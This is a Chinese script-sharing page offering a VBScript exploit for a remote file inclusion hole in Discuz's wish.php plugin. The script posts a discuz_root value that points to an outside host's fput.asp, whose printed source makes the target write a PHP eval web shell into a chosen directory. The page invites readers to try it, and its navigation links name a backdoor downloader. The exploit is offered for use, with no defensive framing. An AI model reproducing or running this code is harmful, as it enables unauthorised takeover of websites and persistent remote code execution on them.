减小字体
增大字体- ·上一篇文章:列出IIS的站点ID、描述、及物理目录
- ·下一篇文章:下载exe并执行(带参数,可以做个后门)
- ·百度中搜索更多的关于“php包含漏洞的通用上传vbs程序”相关内容
- ·谷歌中搜索更多的关于“php包含漏洞的通用上传vbs程序”相关内容
- ******申明******
- 本站文章内容有部分为收录网络中其他网友内容,DOS资源站不保证所有的代码都适合你使用。
- 由于编辑匆忙,有可能造成某些脚本文件出现丢失代码或代码无法运行的情况,请网友根据情况自行修改。
- 如果能将出错部分反馈给我,那就更好了。
php包含漏洞的通用上传vbs程序
set http=createobject("Microsoft.XMLHTTP")
http.open "POST","http://www.discuz.net:80/wish.php",false'漏洞的url地址
http.setrequestheader "Content-Type","application/x-www-form-urlencoded"
http.setRequestHeader "Cookie","123456xxxx" '自己抓取修改,如果没有验证就默认吧
name="http://www.xxx.com/fput.asp?a=/可写物理目录/文件名.php?" '精华在这个fput.asp?a=可以自行修改生成的目录和文件名
http.send "discuz_root="&name'漏洞url的参数
'以下是fput.asp的源码
'<%
'Dim iPos, sStr
'sStr = Request.QueryString("a")
'iPos = InStr(sStr, "?")
'sStr = Left(sStr, iPos - 1)
'Response.Write "<?fputs(fopen('" & sStr & "','a+'),' <?eval($_POST[p])?>');?>"
'%>
大家可以用来试一下discuz许愿池wish.php漏洞
